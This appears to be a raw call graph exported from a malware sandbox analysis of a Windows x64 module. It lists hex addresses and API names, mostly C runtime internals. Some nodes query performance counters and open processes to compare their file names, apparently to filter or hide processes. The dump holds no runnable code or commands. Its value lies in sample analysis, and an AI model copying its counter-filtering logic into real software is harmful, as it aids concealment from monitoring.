8765->8766 8807 1d29e8ce5e4 8766->8807 8769 1d29e8ceaca 8771 1d29e8ceadf 8769->8771 8772 1d29e8ceacf GetACP 8769->8772 8770 1d29e8ceab8 GetOEMCP 8770->8771 8771->8752 8773 1d29e8cce3c 8771->8773 8772->8771 8774 1d29e8cce4b _invalid_parameter_noinfo 8773->8774 8775 1d29e8cce87 8773->8775 8774->8775 8777 1d29e8cce6e HeapAlloc 8774->8777 8779 1d29e8cbc8c _invalid_parameter_noinfo 2 API calls 8774->8779 8776 1d29e8cdadc __free_lconv_mon 11 API calls 8775->8776 8778 1d29e8cce85 8776->8778 8777->8774 8777->8778 8778->8738 8778->8740 8779->8774 8781 1d29e8cea98 25 API calls 8780->8781 8782 1d29e8cf169 8781->8782 8783 1d29e8cf2bf 8782->8783 8785 1d29e8cf1a6 IsValidCodePage 8782->8785 8790 1d29e8cf1c0 8782->8790 8784 1d29e8c7d70 _log10_special 8 API calls 8783->8784 8786 1d29e8cef05 8784->8786 8785->8783 8787 1d29e8cf1b7 8785->8787 8786->8743 8786->8747 8788 1d29e8cf1e6 GetCPInfo 8787->8788 8787->8790 8788->8783 8788->8790 8823 1d29e8cebb0 8790->8823 8900 1d29e8ccdcc EnterCriticalSection 8791->8900 8808 1d29e8ce608 8807->8808 8814 1d29e8ce603 8807->8814 8809 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 8808->8809 8808->8814 8810 1d29e8ce623 8809->8810 8815 1d29e8d082c 8810->8815 8814->8769 8814->8770 8816 1d29e8d0841 8815->8816 8817 1d29e8ce646 8815->8817 8816->8817 8818 1d29e8d0e8c _invalid_parameter_noinfo 23 API calls 8816->8818 8819 1d29e8d0898 8817->8819 8818->8817 8820 1d29e8d08ad 8819->8820 8822 1d29e8d08c0 8819->8822 8821 1d29e8cf120 _invalid_parameter_noinfo 23 API calls 8820->8821 8820->8822 8821->8822 8822->8814 8824 1d29e8cebed GetCPInfo 8823->8824 8825 1d29e8cece3 8823->8825 8824->8825 8830 1d29e8cec00 8824->8830 8826 1d29e8c7d70 _log10_special 8 API calls 8825->8826 8827 1d29e8ced82 8826->8827 8827->8783 8834 1d29e8d1974 8830->8834 8835 1d29e8ce5e4 23 API calls 8834->8835 8836 1d29e8d19b6 8835->8836 8854 1d29e8cf4ac 8836->8854 8856 1d29e8cf4b5 MultiByteToWideChar 8854->8856 8902 1d29e8cc69d 8901->8902 8903 1d29e8cc655 8901->8903 8904 1d29e8cc6c6 8902->8904 8905 1d29e8cdb74 __free_lconv_mon 11 API calls 8902->8905 8903->8707 8906 1d29e8cdb74 __free_lconv_mon 11 API calls 8904->8906 8905->8902 8906->8903 9045 1d29e8cd094 9046 1d29e8cd099 9045->9046 9047 1d29e8cd0ae 9045->9047 9051 1d29e8cd0b4 9046->9051 9052 1d29e8cd0f6 9051->9052 9053 1d29e8cd0fe 9051->9053 9054 1d29e8cdb74 __free_lconv_mon 11 API calls 9052->9054 9055 1d29e8cdb74 __free_lconv_mon 11 API calls 9053->9055 9054->9053 9056 1d29e8cd10b 9055->9056 9057 1d29e8cdb74 __free_lconv_mon 11 API calls 9056->9057 9058 1d29e8cd118 9057->9058 9059 1d29e8cdb74 __free_lconv_mon 11 API calls 9058->9059 9060 1d29e8cd125 9059->9060 9061 1d29e8cdb74 __free_lconv_mon 11 API calls 9060->9061 9062 1d29e8cd132 9061->9062 9063 1d29e8cdb74 __free_lconv_mon 11 API calls 9062->9063 9064 1d29e8cd13f 9063->9064 9065 1d29e8cdb74 __free_lconv_mon 11 API calls 9064->9065 9066 1d29e8cd14c 9065->9066 9067 1d29e8cdb74 __free_lconv_mon 11 API calls 9066->9067 9068 1d29e8cd159 9067->9068 9069 1d29e8cdb74 __free_lconv_mon 11 API calls 9068->9069 9070 1d29e8cd169 9069->9070 9071 1d29e8cdb74 __free_lconv_mon 11 API calls 9070->9071 9072 1d29e8cd179 9071->9072 9077 1d29e8ccf64 9072->9077 9091 1d29e8ccdcc EnterCriticalSection 9077->9091 7651 1d29e8d522d 7660 1d29e8ca0c0 7651->7660 7655 1d29e8d5293 7656 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7655->7656 7658 1d29e8d52a3 7656->7658 7659 1d29e8d527f __CxxCallCatchBlock 7671 1d29e8c9a64 7659->7671 7661 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7660->7661 7662 1d29e8ca0d2 7661->7662 7663 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7662->7663 7665 1d29e8ca10d 7662->7665 7664 1d29e8ca0dd 7663->7664 7664->7665 7666 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7664->7666 7667 1d29e8ca0fe 7666->7667 7667->7659 7668 1d29e8c9750 7667->7668 7669 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7668->7669 7670 1d29e8c975e 7669->7670 7670->7659 7674 1d29e8c9a80 7671->7674 7673 1d29e8c9a6d 7673->7655 7675 1d29e8c9a9f GetLastError 7674->7675 7676 1d29e8c9a98 7674->7676 7686 1d29e8ca3d4 7675->7686 7676->7673 7690 1d29e8ca1f4 7686->7690 7691 1d29e8ca30e TlsGetValue 7690->7691 7697 1d29e8ca238 __vcrt_InitializeCriticalSectionEx 7690->7697 7692 1d29e8ca266 LoadLibraryExW 7694 1d29e8ca2dd 7692->7694 7695 1d29e8ca287 GetLastError 7692->7695 7693 1d29e8ca2fd GetProcAddress 7693->7691 7694->7693 7696 1d29e8ca2f4 FreeLibrary 7694->7696 7695->7697 7696->7693 7697->7691 7697->7692 7697->7693 7698 1d29e8ca2a9 LoadLibraryExW 7697->7698 7698->7694 7698->7697 8207 1d29e8c2fac 8208 1d29e8c2fd3 8207->8208 8209 1d29e8c30a0 8208->8209 8210 1d29e8c2ff0 PdhGetCounterInfoW 8208->8210 8210->8209 8211 1d29e8c3012 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8210->8211 8212 1d29e8c308c GetProcessHeap HeapFree 8211->8212 8213 1d29e8c3044 StrCmpW 8211->8213 8212->8209 8213->8212 8215 1d29e8c3059 8213->8215 8215->8212 8216 1d29e8c3554 StrCmpNW 8215->8216 8217 1d29e8c35f6 8216->8217 8218 1d29e8c3586 StrStrW 8216->8218 8217->8215 8218->8217 8219 1d29e8c359f StrToIntW 8218->8219 8219->8217 8220 1d29e8c35c7 8219->8220 8220->8217 8226 1d29e8c1934 OpenProcess 8220->8226 8227 1d29e8c19ba 8226->8227 8228 1d29e8c1968 K32GetModuleFileNameExW 8226->8228 8227->8217 8232 1d29e8c3c74 8227->8232 8229 1d29e8c19b1 CloseHandle 8228->8229 8230 1d29e8c1982 PathFindFileNameW lstrlenW 8228->8230 8229->8227 8230->8229 8231 1d29e8c19a0 StrCpyW 8230->8231 8231->8229 8233 1d29e8c3c81 StrCmpNIW 8232->8233 8234 1d29e8c35e8 8232->8234 8233->8234 8234->8217 8235 1d29e8c1c00 8234->8235 8236 1d29e8c1c17 8235->8236 8237 1d29e8c1c20 8235->8237 8238 1d29e8c152c 2 API calls 8236->8238 8237->8217 8238->8237 8907 1d29e8cf72c 8908 1d29e8cf74e 8907->8908 8909 1d29e8cf76b 8907->8909 8908->8909 8910 1d29e8cf75c 8908->8910 8911 1d29e8cf775 8909->8911 8916 1d29e8d1ee8 8909->8916 8912 1d29e8cdadc __free_lconv_mon 11 API calls 8910->8912 8923 1d29e8d1f24 8911->8923 8915 1d29e8cf761 8912->8915 8917 1d29e8d1ef1 8916->8917 8918 1d29e8d1f0a HeapSize 8916->8918 8919 1d29e8cdadc __free_lconv_mon 11 API calls 8917->8919 8920 1d29e8d1ef6 8919->8920 8921 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 8920->8921 8922 1d29e8d1f01 8921->8922 8922->8911 8924 1d29e8d1f39 8923->8924 8925 1d29e8d1f43 8923->8925 8926 1d29e8cce3c 12 API calls 8924->8926 8927 1d29e8d1f48 8925->8927 8933 1d29e8d1f4f _invalid_parameter_noinfo 8925->8933 8931 1d29e8d1f41 8926->8931 8928 1d29e8cdb74 __free_lconv_mon 11 API calls 8927->8928 8928->8931 8929 1d29e8d1f82 HeapReAlloc 8929->8931 8929->8933 8930 1d29e8d1f55 8932 1d29e8cdadc __free_lconv_mon 11 API calls 8930->8932 8931->8915 8932->8931 8933->8929 8933->8930 8934 1d29e8cbc8c _invalid_parameter_noinfo 2 API calls 8933->8934 8934->8933 8239 1d29e8cb1a8 8240 1d29e8cb1d5 __except_validate_context_record 8239->8240 8241 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8240->8241 8242 1d29e8cb1da 8241->8242 8245 1d29e8cb234 8242->8245 8247 1d29e8cb2c2 8242->8247 8254 1d29e8cb288 8242->8254 8243 1d29e8cb330 8243->8254 8281 1d29e8ca974 8243->8281 8244 1d29e8cb2af 8268 1d29e8c9d10 8244->8268 8245->8244 8253 1d29e8cb256 __GetCurrentState 8245->8253 8245->8254 8250 1d29e8cb2e1 8247->8250 8275 1d29e8ca114 8247->8275 8250->8243 8250->8254 8278 1d29e8ca128 8250->8278 8251 1d29e8cb3d9 8253->8251 8256 1d29e8cb6b8 8253->8256 8257 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8256->8257 8258 1d29e8cb6e7 __GetCurrentState 8257->8258 8259 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8258->8259 8265 1d29e8cb704 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8259->8265 8260 1d29e8cb7fb 8261 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8260->8261 8262 1d29e8cb800 8261->8262 8264 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8262->8264 8266 1d29e8cb80b __FrameHandler3::GetHandlerSearchState 8262->8266 8263 1d29e8ca114 9 API calls Is_bad_exception_allowed 8263->8265 8264->8266 8265->8260 8265->8263 8265->8266 8338 1d29e8ca13c 8265->8338 8266->8254 8341 1d29e8c9d74 8268->8341 8270 1d29e8c9d2f __FrameHandler3::GetHandlerSearchState 8345 1d29e8c9c80 8270->8345 8273 1d29e8cb6b8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8274 1d29e8c9d64 8273->8274 8274->8254 8276 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8275->8276 8277 1d29e8ca11d 8276->8277 8277->8250 8279 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8278->8279 8280 1d29e8ca131 8279->8280 8280->8243 8349 1d29e8cb844 8281->8349 8283 1d29e8cae42 8284 1d29e8cad93 8284->8283 8325 1d29e8cad91 8284->8325 8402 1d29e8cae4c 8284->8402 8285 1d29e8caabb 8285->8284 8322 1d29e8caaf3 8285->8322 8287 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8291 1d29e8cadd5 8287->8291 8288 1d29e8cacc4 8296 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8288->8296 8297 1d29e8cace1 8288->8297 8288->8325 8289 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8292 1d29e8caa22 8289->8292 8291->8283 8293 1d29e8c7d70 _log10_special 8 API calls 8291->8293 8292->8291 8294 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8292->8294 8295 1d29e8cade8 8293->8295 8299 1d29e8caa32 8294->8299 8295->8254 8296->8297 8300 1d29e8cad03 8297->8300 8297->8325 8395 1d29e8c9ce4 8297->8395 8301 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8299->8301 8302 1d29e8cae25 8300->8302 8303 1d29e8cad19 8300->8303 8300->8325 8304 1d29e8caa3b 8301->8304 8306 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8302->8306 8305 1d29e8cad24 8303->8305 8308 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8303->8308 8360 1d29e8ca154 8304->8360 8312 1d29e8cb8dc 9 API calls 8305->8312 8309 1d29e8cae2b 8306->8309 8308->8305 8311 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8309->8311 8314 1d29e8cae34 8311->8314 8315 1d29e8cad3b 8312->8315 8313 1d29e8ca128 9 API calls 8313->8322 8317 1d29e8ccad8 23 API calls 8314->8317 8319 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8315->8319 8315->8325 8316 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8318 1d29e8caa7d 8316->8318 8317->8283 8318->8285 8321 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8318->8321 8320 1d29e8cad55 8319->8320 8399 1d29e8c9f80 RtlUnwindEx 8320->8399 8324 1d29e8caa89 8321->8324 8322->8288 8322->8313 8374 1d29e8cb068 8322->8374 8388 1d29e8ca8a0 8322->8388 8326 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8324->8326 8325->8287 8328 1d29e8caa92 8326->8328 8363 1d29e8cb8dc 8328->8363 8332 1d29e8caaa6 8370 1d29e8cb9cc 8332->8370 8334 1d29e8cae1f 8335 1d29e8ccad8 23 API calls 8334->8335 8335->8302 8336 1d29e8caaae __CxxCallCatchBlock std::bad_alloc::bad_alloc 8336->8334 8337 1d29e8c98d0 Concurrency::cancel_current_task 2 API calls 8336->8337 8337->8334 8339 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8338->8339 8340 1d29e8ca14a 8339->8340 8340->8265 8344 1d29e8c9da2 __FrameHandler3::GetHandlerSearchState 8341->8344 8342 1d29e8c9e12 8342->8270 8343 1d29e8c9dce RtlLookupFunctionEntry 8343->8344 8344->8342 8344->8343 8346 1d29e8c9c9e 8345->8346 8347 1d29e8c9ccb 8346->8347 8348 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8346->8348 8347->8273 8348->8346 8350 1d29e8cb869 __FrameHandler3::GetHandlerSearchState 8349->8350 8351 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8350->8351 8352 1d29e8cb87e 8351->8352 8414 1d29e8ca4fc 8352->8414 8355 1d29e8cb890 __FrameHandler3::GetHandlerSearchState 8417 1d29e8ca534 8355->8417 8356 1d29e8cb8b3 8357 1d29e8ca4fc __GetUnwindTryBlock RtlLookupFunctionEntry 8356->8357 8359 1d29e8ca9d6 8357->8359 8359->8283 8359->8285 8359->8289 8361 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8360->8361 8362 1d29e8ca162 8361->8362 8362->8283 8362->8316 8365 1d29e8cb9c3 8363->8365 8367 1d29e8cb907 8363->8367 8364 1d29e8caaa2 8364->8285 8364->8332 8366 1d29e8ca128 9 API calls 8366->8367 8367->8364 8367->8366 8368 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8367->8368 8369 1d29e8cb068 9 API calls 8367->8369 8368->8367 8369->8367 8371 1d29e8cba39 8370->8371 8373 1d29e8cb9e9 Is_bad_exception_allowed 8370->8373 8371->8336 8372 1d29e8ca114 9 API calls Is_bad_exception_allowed 8372->8373 8373->8371 8373->8372 8375 1d29e8cb124 8374->8375 8376 1d29e8cb095 8374->8376 8375->8322 8377 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8376->8377 8378 1d29e8cb09e 8377->8378 8378->8375 8379 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8378->8379 8380 1d29e8cb0b7 8378->8380 8379->8380 8380->8375 8381 1d29e8cb0e3 8380->8381 8382 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8380->8382 8383 1d29e8ca128 9 API calls 8381->8383 8382->8381 8384 1d29e8cb0f7 8383->8384 8384->8375 8385 1d29e8cb110 8384->8385 8386 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8384->8386 8387 1d29e8ca128 9 API calls 8385->8387 8386->8385 8387->8375 8389 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8388->8389 8390 1d29e8ca8dd 8389->8390 8391 1d29e8ca114 Is_bad_exception_allowed 9 API calls 8390->8391 8392 1d29e8ca915 8391->8392 8393 1d29e8c9f80 9 API calls 8392->8393 8394 1d29e8ca959 8393->8394 8394->8322 8396 1d29e8c9cf8 __FrameHandler3::GetHandlerSearchState 8395->8396 8397 1d29e8c9c80 __FrameHandler3::ExecutionInCatch 9 API calls 8396->8397 8398 1d29e8c9d02 8397->8398 8398->8300 8400 1d29e8c7d70 _log10_special 8 API calls 8399->8400 8401 1d29e8ca07a 8400->8401 8401->8325 8403 1d29e8cae82 8402->8403 8410 1d29e8caef0 8402->8410 8404 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8403->8404 8405 1d29e8cae87 8404->8405 8406 1d29e8cae96 EncodePointer 8405->8406 8412 1d29e8caeec 8405->8412 8407 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8406->8407 8408 1d29e8caea6 8407->8408 8408->8412 8420 1d29e8c9c2c 8408->8420 8410->8325 8411 1d29e8ca8a0 19 API calls 8411->8412 8412->8410 8412->8411 8413 1d29e8ca114 9 API calls Is_bad_exception_allowed 8412->8413 8413->8412 8415 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8414->8415 8416 1d29e8ca50f 8415->8416 8416->8355 8416->8356 8418 1d29e8c9d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8417->8418 8419 1d29e8ca54e 8418->8419 8419->8359 8421 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8420->8421 8422 1d29e8c9c58 8421->8422 8422->8412 8935 1d29e8cb53e 8936 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8935->8936 8938 1d29e8cb54b __CxxCallCatchBlock 8936->8938 8937 1d29e8cb58f RaiseException 8939 1d29e8cb5b6 8937->8939 8938->8937 8940 1d29e8ca0c0 __CxxCallCatchBlock 9 API calls 8939->8940 8943 1d29e8cb5be 8940->8943 8941 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8942 1d29e8cb5fa 8941->8942 8944 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8942->8944 8945 1d29e8c9750 __CxxCallCatchBlock 9 API calls 8943->8945 8947 1d29e8cb5e7 __CxxCallCatchBlock 8943->8947 8946 1d29e8cb603 8944->8946 8945->8947 8947->8941 7699 1d29e8c8440 7702 1d29e8c9818 7699->7702 7701 1d29e8c8469 7703 1d29e8c986e __vcrt_freefls 7702->7703 7704 1d29e8c9839 7702->7704 7703->7701 7704->7703 7706 1d29e8ccb18 7704->7706 7707 1d29e8ccb2f 7706->7707 7708 1d29e8ccb25 7706->7708 7715 1d29e8cdadc 7707->7715 7708->7707 7713 1d29e8ccb4a 7708->7713 7710 1d29e8ccb36 7718 1d29e8cd9a0 7710->7718 7711 1d29e8ccb42 7711->7703 7713->7711 7714 1d29e8cdadc __free_lconv_mon 11 API calls 7713->7714 7714->7710 7721 1d29e8cd3d0 GetLastError 7715->7721 7717 1d29e8cdae5 7717->7710 7779 1d29e8cd838 7718->7779 7722 1d29e8cd411 FlsSetValue 7721->7722 7725 1d29e8cd3f4 7721->7725 7723 1d29e8cd401 SetLastError 7722->7723 7724 1d29e8cd423 7722->7724 7723->7717 7738 1d29e8cdafc 7724->7738 7725->7722 7725->7723 7729 1d29e8cd450 FlsSetValue 7732 1d29e8cd46e 7729->7732 7733 1d29e8cd45c FlsSetValue 7729->7733 7730 1d29e8cd440 FlsSetValue 7731 1d29e8cd449 7730->7731 7745 1d29e8cdb74 7731->7745 7751 1d29e8ccfc4 7732->7751 7733->7731 7743 1d29e8cdb0d _invalid_parameter_noinfo 7738->7743 7739 1d29e8cdb5e 7742 1d29e8cdadc __free_lconv_mon 10 API calls 7739->7742 7740 1d29e8cdb42 HeapAlloc 7741 1d29e8cd432 7740->7741 7740->7743 7741->7729 7741->7730 7742->7741 7743->7739 7743->7740 7756 1d29e8cbc8c 7743->7756 7746 1d29e8cdbaa 7745->7746 7747 1d29e8cdb79 HeapFree 7745->7747 7746->7723 7747->7746 7748 1d29e8cdb94 GetLastError 7747->7748 7749 1d29e8cdba1 __free_lconv_mon 7748->7749 7750 1d29e8cdadc __free_lconv_mon 9 API calls 7749->7750 7750->7746 7765 1d29e8cce9c 7751->7765 7759 1d29e8cbccc 7756->7759 7764 1d29e8ccdcc EnterCriticalSection 7759->7764 7777 1d29e8ccdcc EnterCriticalSection 7765->7777 7780 1d29e8cd863 7779->7780 7787 1d29e8cd8d4 7780->7787 7783 1d29e8cd8ad 7785 1d29e8cd8c2 7783->7785 7786 1d29e8ccbd0 _invalid_parameter_noinfo 28 API calls 7783->7786 7785->7711 7786->7785 7810 1d29e8cd61c 7787->7810 7791 1d29e8cd88a 7791->7783 7797 1d29e8ccbd0 7791->7797 7798 1d29e8ccbdf GetLastError 7797->7798 7799 1d29e8ccc28 7797->7799 7800 1d29e8ccbf4 7798->7800 7799->7783 7801 1d29e8cd498 _invalid_parameter_noinfo 14 API calls 7800->7801 7802 1d29e8ccc0e SetLastError 7801->7802 7802->7799 7803 1d29e8ccc31 7802->7803 7804 1d29e8ccbd0 _invalid_parameter_noinfo 26 API calls 7803->7804 7805 1d29e8ccc57 7804->7805 7859 1d29e8d0860 7805->7859 7811 1d29e8cd638 GetLastError 7810->7811 7812 1d29e8cd673 7810->7812 7813 1d29e8cd648 7811->7813 7812->7791 7816 1d29e8cd688 7812->7816 7823 1d29e8cd498 7813->7823 7817 1d29e8cd6a4 GetLastError SetLastError 7816->7817 7818 1d29e8cd6bc 7816->7818 7817->7818 7818->7791 7819 1d29e8cd9c0 IsProcessorFeaturePresent 7818->7819 7820 1d29e8cd9d3 7819->7820 7837 1d29e8cd6d4 7820->7837 7824 1d29e8cd4b7 FlsGetValue 7823->7824 7826 1d29e8cd4cc 7823->7826 7825 1d29e8cd4c4 SetLastError 7824->7825 7824->7826 7825->7812 7826->7825 7827 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7826->7827 7828 1d29e8cd4ee 7827->7828 7829 1d29e8cd50c FlsSetValue 7828->7829 7832 1d29e8cd4fc 7828->7832 7830 1d29e8cd52a 7829->7830 7831 1d29e8cd518 FlsSetValue 7829->7831 7833 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7830->7833 7831->7832 7834 1d29e8cdb74 __free_lconv_mon 11 API calls 7832->7834 7835 1d29e8cd532 7833->7835 7834->7825 7836 1d29e8cdb74 __free_lconv_mon 11 API calls 7835->7836 7836->7825 7838 1d29e8cd70e _invalid_parameter_noinfo 7837->7838 7839 1d29e8cd736 RtlCaptureContext RtlLookupFunctionEntry 7838->7839 7840 1d29e8cd770 RtlVirtualUnwind 7839->7840 7841 1d29e8cd7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7839->7841 7840->7841 7842 1d29e8cd7f8 _invalid_parameter_noinfo 7841->7842 7845 1d29e8c7d70 7842->7845 7847 1d29e8c7d79 7845->7847 7846 1d29e8c7d84 GetCurrentProcess TerminateProcess 7847->7846 7848 1d29e8c855c IsProcessorFeaturePresent 7847->7848 7849 1d29e8c8574 7848->7849 7854 1d29e8c8750 RtlCaptureContext 7849->7854 7855 1d29e8c876a RtlLookupFunctionEntry 7854->7855 7856 1d29e8c8780 RtlVirtualUnwind 7855->7856 7857 1d29e8c8587 7855->7857 7856->7855 7856->7857 7858 1d29e8c8528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7857->7858 7860 1d29e8d0879 7859->7860 7862 1d29e8ccc7f 7859->7862 7860->7862 7867 1d29e8d0e8c 7860->7867 7863 1d29e8d08cc 7862->7863 7864 1d29e8ccc8f 7863->7864 7865 1d29e8d08e5 7863->7865 7864->7783 7865->7864 7913 1d29e8cf120 7865->7913 7876 1d29e8cd258 GetLastError 7867->7876 7869 1d29e8d0e9b 7875 1d29e8d0ee1 7869->7875 7912 1d29e8ccdcc EnterCriticalSection 7869->7912 7875->7862 7877 1d29e8cd27c FlsGetValue 7876->7877 7878 1d29e8cd299 FlsSetValue 7876->7878 7879 1d29e8cd293 7877->7879 7896 1d29e8cd289 7877->7896 7880 1d29e8cd2ab 7878->7880 7878->7896 7879->7878 7882 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7880->7882 7881 1d29e8cd305 SetLastError 7883 1d29e8cd312 7881->7883 7890 1d29e8cd325 7881->7890 7884 1d29e8cd2ba 7882->7884 7883->7869 7885 1d29e8cd2d8 FlsSetValue 7884->7885 7886 1d29e8cd2c8 FlsSetValue 7884->7886 7888 1d29e8cd2f6 7885->7888 7889 1d29e8cd2e4 FlsSetValue 7885->7889 7887 1d29e8cd2d1 7886->7887 7891 1d29e8cdb74 __free_lconv_mon 11 API calls 7887->7891 7892 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7888->7892 7889->7887 7894 1d29e8cd33d FlsGetValue 7890->7894 7895 1d29e8cd358 FlsSetValue 7890->7895 7891->7896 7893 1d29e8cd2fe 7892->7893 7897 1d29e8cdb74 __free_lconv_mon 11 API calls 7893->7897 7898 1d29e8cd352 7894->7898 7901 1d29e8cd34a 7894->7901 7899 1d29e8cd365 7895->7899 7895->7901 7896->7881 7897->7881 7898->7895 7900 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 7899->7900 7902 1d29e8cd374 7900->7902 7901->7869 7903 1d29e8cd392 FlsSetValue 7902->7903 7904 1d29e8cd382 FlsSetValue 7902->7904 7906 1d29e8cd39e FlsSetValue 7903->7906 7907 1d29e8cd3b0 7903->7907 7905 1d29e8cd38b 7904->7905 7908 1d29e8cdb74 __free_lconv_mon 11 API calls 7905->7908 7906->7905 7909 1d29e8ccfc4 _invalid_parameter_noinfo 11 API calls 7907->7909 7908->7901 7910 1d29e8cd3b8 7909->7910 7911 1d29e8cdb74 __free_lconv_mon 11 API calls 7910->7911 7911->7901 7914 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 7913->7914 7915 1d29e8cf129 7914->7915 9093 1d29e8c7ec0 9094 1d29e8c7ec9 __scrt_acquire_startup_lock 9093->9094 9096 1d29e8c7ecd 9094->9096 9097 1d29e8cc38c 9094->9097 9098 1d29e8cc3c3 9097->9098 9099 1d29e8cc3ac 9097->9099 9098->9096 9100 1d29e8cc3ca 9099->9100 9101 1d29e8cc3b4 9099->9101 9103 1d29e8cf0c0 69 API calls 9100->9103 9102 1d29e8cdadc __free_lconv_mon 11 API calls 9101->9102 9104 1d29e8cc3b9 9102->9104 9105 1d29e8cc3cf 9103->9105 9106 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9104->9106 9128 1d29e8ce7a4 GetModuleFileNameW 9105->9128 9106->9098 9113 1d29e8cc441 9115 1d29e8cdadc __free_lconv_mon 11 API calls 9113->9115 9114 1d29e8cc459 9116 1d29e8cc164 23 API calls 9114->9116 9117 1d29e8cc446 9115->9117 9121 1d29e8cc475 9116->9121 9118 1d29e8cdb74 __free_lconv_mon 11 API calls 9117->9118 9118->9098 9119 1d29e8cc47b 9120 1d29e8cdb74 __free_lconv_mon 11 API calls 9119->9120 9120->9098 9121->9119 9122 1d29e8cc4c0 9121->9122 9123 1d29e8cc4a7 9121->9123 9126 1d29e8cdb74 __free_lconv_mon 11 API calls 9122->9126 9124 1d29e8cdb74 __free_lconv_mon 11 API calls 9123->9124 9125 1d29e8cc4b0 9124->9125 9127 1d29e8cdb74 __free_lconv_mon 11 API calls 9125->9127 9126->9119 9127->9098 9129 1d29e8ce7fd 9128->9129 9130 1d29e8ce7e9 GetLastError 9128->9130 9132 1d29e8ce5e4 23 API calls 9129->9132 9152 1d29e8cda50 9130->9152 9134 1d29e8ce82b 9132->9134 9133 1d29e8ce7f6 9135 1d29e8c7d70 _log10_special 8 API calls 9133->9135 9139 1d29e8ce83c 9134->9139 9157 1d29e8cf9d8 9134->9157 9138 1d29e8cc3e6 9135->9138 9140 1d29e8cc164 9138->9140 9160 1d29e8ce688 9139->9160 9142 1d29e8cc1a2 9140->9142 9144 1d29e8cc20e 9142->9144 9174 1d29e8cf470 9142->9174 9143 1d29e8cc2ff 9146 1d29e8cc32c 9143->9146 9144->9143 9145 1d29e8cf470 23 API calls 9144->9145 9145->9144 9147 1d29e8cc37c 9146->9147 9148 1d29e8cc344 9146->9148 9147->9113 9147->9114 9148->9147 9149 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9148->9149 9150 1d29e8cc372 9149->9150 9151 1d29e8cdb74 __free_lconv_mon 11 API calls 9150->9151 9151->9147 9153 1d29e8cd3d0 __free_lconv_mon 11 API calls 9152->9153 9154 1d29e8cda5d __free_lconv_mon 9153->9154 9155 1d29e8cd3d0 __free_lconv_mon 11 API calls 9154->9155 9156 1d29e8cda7f 9155->9156 9156->9133 9158 1d29e8cf7c4 5 API calls 9157->9158 9159 1d29e8cf9f8 9158->9159 9159->9139 9161 1d29e8ce6c7 9160->9161 9165 1d29e8ce6ac 9160->9165 9162 1d29e8cf53c WideCharToMultiByte 9161->9162 9167 1d29e8ce6cc 9161->9167 9163 1d29e8ce723 9162->9163 9166 1d29e8ce72a GetLastError 9163->9166 9163->9167 9168 1d29e8ce755 9163->9168 9164 1d29e8cdadc __free_lconv_mon 11 API calls 9164->9165 9165->9133 9169 1d29e8cda50 11 API calls 9166->9169 9167->9164 9167->9165 9170 1d29e8cf53c WideCharToMultiByte 9168->9170 9171 1d29e8ce737 9169->9171 9172 1d29e8ce77c 9170->9172 9173 1d29e8cdadc __free_lconv_mon 11 API calls 9171->9173 9172->9165 9172->9166 9173->9165 9175 1d29e8cf3fc 9174->9175 9176 1d29e8ce5e4 23 API calls 9175->9176 9177 1d29e8cf420 9176->9177 9177->9142 9178 1d29e8c30bc 9179 1d29e8c30ec 9178->9179 9180 1d29e8c31a5 9179->9180 9181 1d29e8c3109 PdhGetCounterInfoW 9179->9181 9181->9180 9182 1d29e8c3127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 